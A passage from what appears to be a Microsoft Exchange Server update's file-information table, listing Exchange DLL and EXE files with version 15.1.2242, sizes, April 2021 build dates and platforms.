\nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.1.2242.5| 19,832| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.1.2242.5| 20,344| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.1.2242.5| 19,328| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.1.2242.5| 34,184| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.1.2242.5| 103,808| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.1.2242.5| 31,624| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.1.2242.5| 15,752| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.1.2242.5| 20,864| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.1.2242.5| 16,264| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.1.2242.5| 49,024| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.1.2242.5| 44,424| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.1.2242.5| 38,288| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.1.2242.5| 10,375,048| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.1.2242.5| 29,080| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.1.2242.5| 21,384| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.1.2242.5| 24,456| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.1.2242.5| 15,224| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.1.2242.5| 21,880| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.core.dll| 15.1.2242.5| 89,472| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.1.2242.5| 20,872| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.1.2242.5| 26,504| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.1.2242.5| 21,384| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.1.2242.5| 28,024| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.1.2242.5| 28,544| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.1.2242.5| 36,232| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.1.2242.5| 16,776| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.1.2242.5| 19,840| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.1.2242.5| 15,224| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.1.2242.5| 17,272| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.1.2242.5| 19,832| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.1.2242.5| 57,240| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.1.2242.5| 17,800| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.1.2242.5| 18,816| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.1.2242.5| 16,264| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.1.2242.5| 17,800| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.1.2242.5| 15,232| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.1.2242.5| 15,256| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.1.2242.5| 52,608| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.1.2242.5| 18,312| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.1.2242.5| 34,200| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.1.2242.5| 17,272| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.1.2242.5| 18,824| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.1.2242.5| 43,400| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loguploader.dll| 15.1.2242.5| 165,272| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.1.2242.5| 54,664| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.1.2242.8| 9,059,192| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.1.2242.5| 33,144| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.mailboxassistants.common.dll| 15.1.2242.8| 124,296| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.1.2242.5| 82,832| 04-Apr-2021| 09:12| x64 \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.1.2242.5| 14,232| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.1.2242.8| 30,088| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.1.2242.8| 661,368| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.1.2242.8| 63,368| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.1.2242.8| 175,496| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.1.2242.8| 2,784,144| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.1.2242.8| 53,128| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.1.2242.8| 151,944| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.1.2242.8| 966,024| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.1.2242.8| 185,224| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.1.2242.5| 31,632| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.1.2242.8| 39,816| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.1.2242.8| 105,864| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.1.2242.8| 94,600| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.1.2242.8| 43,400| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.1.2242.5| 18,808| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.1.2242.8| 172,936| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.1.2242.8| 102,792| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.1.2242.8| 98,696| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.1.2242.8| 188,312| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.1.2242.8| 43,392| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.1.2242.5| 447,368| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.1.2242.8| 89,992| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.1.2242.8| 107,912| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.1.2242.8| 371,072| 04-Apr-2021| 09:14| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.1.2242.8| 193,928| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.1.2242.8| 551,808| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.1.2242.5| 16,264| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.1.2242.5| 15,760| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.1.2242.8| 321,432| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.1.2242.5| 17,792| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.1.2242.8| 45,440| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.1.2242.8| 18,320| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.1.2242.5| 12,672| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.1.2242.5| 20,888| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.1.2242.5| 415,128| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.1.2242.5| 1,269,656| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.1.2242.8| 39,304| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.1.2242.5| 433,560| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.1.2242.8| 4,563,328| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.1.2242.5| 261,000| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.1.2242.5| 33,656| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.1.2242.5| 94,096| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.management.deployment.dll| 15.1.2242.8| 591,248| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.1.2242.5| 3,560,856| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.1.2242.8| 67,968| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.management.dll| 15.1.2242.8| 16,478,088| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.1.2242.8| 58,744| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.1.2242.8| 23,952| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.1.2242.8| 101,760| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.management.migration.dll| 15.1.2242.8| 543,640| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.management.mobility.dll| 15.1.2242.8| 305,048| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.1.2242.5| 131,960| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.1.2242.8| 418,688| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.1.2242.8| 275,848| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.1.2242.8| 70,528| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.1.2242.5| 7,873,928| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.management.recipient.dll| 15.1.2242.8| 1,500,552| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.management.reportingwebservice.dll| 15.1.2242.8| 145,280| 04-Apr-2021| 09:14| x86 \nMicrosoft.exchange.management.reportingwebservice.eventlog.dll| 15.1.2242.5| 13,696| 04-Apr-2021| 09:12| x64 \nMicrosoft.exchange.management.snapin.esm.dll| 15.1.2242.8| 71,552| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.1.2242.8| 1,249,176| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.management.transport.dll| 15.1.2242.8| 1,876,864| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.managementgui.dll| 15.1.2242.5| 5,225,880| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.managementmsg.dll| 15.1.2242.5| 36,224| 04-Apr-2021| 09:13| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.1.2242.5| 117,632| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.1.2242.8| 209,800| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.1.2242.5| 79,736| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.1.2242.5| 17,304| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.1.2242.8| 156,056| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.1.2242.8| 65,928| 04-Apr-2021| 09:14| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.1.2242.5| 30,616| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.1.2242.8| 58,232| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.1.2242.8| 29,584| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.1.2242.8| 175,496| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.1.2242.8| 28,552| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.1.2242.8| 75,152| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.1.2242.8| 207,240| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.1.2242.8| 440,704| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.1.2242.8| 83,328| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.1.2242.8| 35,224| 04-Apr-2021| 09:14| x86 \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.1.2242.8| 53,128| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.1.2242.8| 96,640| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.migration.dll| 15.1.2242.8| 1,110,424| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.1.2242.5| 14,744| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.mobiledriver.dll| 15.1.2242.8| 135,576| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.1.2242.8| 5,157,784| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.1.2242.5| 19,864| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.1.2242.5| 68,488| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.net.dll| 15.1.2242.5| 5,084,040| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.net.rightsmanagement.dll| 15.1.2242.5| 265,624| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.networksettings.dll| 15.1.2242.5| 37,784| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.1.2242.5| 14,208| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.notifications.broker.exe| 15.1.2242.8| 549,784| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.1.2242.5| 22,912| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.1.2242.8| 106,376| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.oauth.core.dll| 15.1.2242.5| 291,712| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.objectstoreclient.dll| 15.1.2242.5| 17,280| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.odata.configuration.dll| 15.1.2242.5| 277,888| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.odata.dll| 15.1.2242.8| 2,992,512| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.officegraph.common.dll| 15.1.2242.5| 88,952| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.officegraph.grain.dll| 15.1.2242.5| 101,784| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.officegraph.graincow.dll| 15.1.2242.5| 38,280| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.1.2242.5| 45,456| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.1.2242.5| 58,232| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.1.2242.5| 147,328| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.1.2242.5| 26,504| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.officegraph.graphstore.dll| 15.1.2242.5| 184,200| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.1.2242.5| 26,520| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.1.2242.5| 38,296| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.1.2242.5| 55,704| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.officegraph.security.dll| 15.1.2242.5| 147,336| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.1.2242.5| 191,880| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.1.2242.5| 33,688| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.partitioncache.dll| 15.1.2242.5| 28,040| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.passivemonitoringsettings.dll| 15.1.2242.5| 32,664| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.1.2242.8| 15,256| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 15.1.2242.5| 17,296| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.pop3.eventlog.dll.fe| 15.1.2242.5| 17,296| 04-Apr-2021| 09:11| Not applicable \nMicrosoft.exchange.pop3.exe| 15.1.2242.5| 106,904| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.1.2242.5| 106,904| 04-Apr-2021| 09:13| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.1.2242.5| 24,968| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.1.2242.5| 24,968| 04-Apr-2021| 09:11| Not applicable \nMicrosoft.exchange.popconfiguration.dl1| 15.1.2242.5| 42,880| 04-Apr-2021| 09:11| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.1.2242.5| 264,080| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.1.2242.5| 264,080| 04-Apr-2021| 09:11| Not applicable \nMicrosoft.exchange.powersharp.dll| 15.1.2242.5| 358,280| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.powersharp.management.dll| 15.1.2242.8| 4,168,064| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.1.2242.8| 326,040| 04-Apr-2021| 09:12| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.1.2242.8| 41,360| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.1.2242.5| 30,600| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.1.2242.5| 135,064| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.1.2242.5| 436,632| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.provisioning.eventlog.dll| 15.1.2242.5| 14,208| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.provisioningagent.dll| 15.1.2242.8| 224,144| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.provisioningservicelet.dll| 15.1.2242.8| 105,864| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.pst.dll| 15.1.2242.5| 168,840| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.pst.dll.deploy| 15.1.2242.5| 168,840| 04-Apr-2021| 09:11| Not applicable \nMicrosoft.exchange.pswsclient.dll| 15.1.2242.5| 259,480| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.publicfolders.dll| 15.1.2242.5| 72,088| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.pushnotifications.crimsonevents.dll| 15.1.2242.5| 215,944| 04-Apr-2021| 09:12| x64 \nMicrosoft.exchange.pushnotifications.dll| 15.1.2242.5| 106,880| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.1.2242.5| 425,848| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.1.2242.5| 70,544| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.query.analysis.dll| 15.1.2242.8| 46,488| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.query.configuration.dll| 15.1.2242.5| 206,720| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.query.core.dll| 15.1.2242.8| 163,200| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.query.ranking.dll| 15.1.2242.8| 342,408| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.query.retrieval.dll| 15.1.2242.8| 149,376| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.query.suggestions.dll| 15.1.2242.8| 95,104| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.1.2242.8| 127,360| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.relevance.core.dll| 15.1.2242.5| 63,368| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.relevance.data.dll| 15.1.2242.5| 36,728| 04-Apr-2021| 09:13| x64 \nMicrosoft.exchange.relevance.mailtagger.dll| 15.1.2242.5| 17,784| 04-Apr-2021| 09:13| x64 \nMicrosoft.exchange.relevance.people.dll| 15.1.2242.8| 9,666,944| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.relevance.peopleindex.dll| 15.1.2242.5| 20,788,088| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.relevance.peopleranker.dll| 15.1.2242.5| 36,744| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.relevance.perm.dll| 15.1.2242.5| 97,664| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.relevance.sassuggest.dll| 15.1.2242.5| 28,568| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.relevance.upm.dll| 15.1.2242.5| 72,056| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.routing.client.dll| 15.1.2242.5| 15,752| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.routing.eventlog.dll| 15.1.2242.5| 13,208| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.routing.server.exe| 15.1.2242.5| 59,288| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.rpc.dll| 15.1.2242.5| 1,639,304| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.1.2242.5| 209,792| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.1.2242.5| 60,296| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.1.2242.5| 517,512| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.1.2242.5| 161,160| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.1.2242.5| 721,816| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.1.2242.5| 243,096| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 15.1.2242.5| 20,888| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.1.2242.8| 35,216| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.rpchttpmodules.dll| 15.1.2242.5| 42,392| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.1.2242.8| 56,216| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 15.1.2242.5| 27,520| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.rules.common.dll| 15.1.2242.5| 130,432| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 15.1.2242.5| 14,712| 04-Apr-2021| 09:16| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.1.2242.8| 20,376| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.safehtml.dll| 15.1.2242.5| 21,384| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.sandbox.activities.dll| 15.1.2242.5| 267,656| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.sandbox.contacts.dll| 15.1.2242.5| 111,000| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.sandbox.core.dll| 15.1.2242.5| 112,520| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.sandbox.services.dll| 15.1.2242.5| 622,464| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.search.bigfunnel.dll| 15.1.2242.8| 162,176| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.search.bigfunnel.eventlog.dll| 15.1.2242.5| 12,160| 04-Apr-2021| 09:11| x64 \nMicrosoft.exchange.search.blingwrapper.dll| 15.1.2242.5| 19,352| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.search.core.dll| 15.1.2242.5| 209,792| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.search.ediscoveryquery.dll| 15.1.2242.8| 17,816| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.search.engine.dll| 15.1.2242.5| 96,648| 04-Apr-2021| 09:12| x86 \nMicrosoft.exchange.search.fast.configuration.dll| 15.1.2242.5| 16,776| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.search.fast.dll| 15.1.2242.5| 435,080| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.search.files.dll| 15.1.2242.8| 274,328| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.search.flighting.dll| 15.1.2242.5| 24,960| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.search.mdb.dll| 15.1.2242.5| 219,032| 04-Apr-2021| 09:13| x86 \nMicrosoft.exchange.search.service.exe| 15.1.2242.5| 26,520| 04-Apr-2021| 09:11| x86 \nMicrosoft.exchange.security.applicationencryption.dll| 15.1.2242.5| 162,200| 04-Apr-2021| 09:11| x86 